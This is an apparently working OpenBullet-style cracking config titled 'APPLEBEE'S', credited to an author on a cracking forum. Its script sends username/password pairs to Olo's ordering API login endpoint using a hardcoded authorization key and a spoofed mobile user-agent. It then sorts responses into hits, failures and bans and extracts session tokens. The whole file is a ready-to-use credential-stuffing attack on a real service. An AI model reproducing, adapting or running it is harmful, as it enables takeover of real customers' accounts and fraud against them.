[SETTINGS]
{
  "Name": "APPLEBEE'S",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-02-09T20:31:46.2064007-05:00",
  "AdditionalInfo": "",
  "Author": "SLAYA ON C.TO",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://ordering.api.olo.com/v1.1//users/authenticate" 
  CONTENT "{\"login\":\"<USER>\",\"password\":\"<PASS>\",\"basketid\":null}" 
  CONTENTTYPE "application/json" 
  HEADER "Authorization: OloKey 9Z51UeNfFwbCAPtFEoHG06JxVDOurhYU" 
  HEADER "Content-Length: 69" 
  HEADER "Host: ordering.api.olo.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "User-Agent: okhttp/3.4.1" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "token" 
  KEYCHAIN Failure OR 
    KEY "{\"code\":200" 
  KEYCHAIN Ban AND 
    KEY "Login is not available at this time. " 
    KEY "{\"code\":200" 

PARSE "<SOURCE>" LR "{\"token\":\"" "\",\"" -> VAR "TOKEN" 

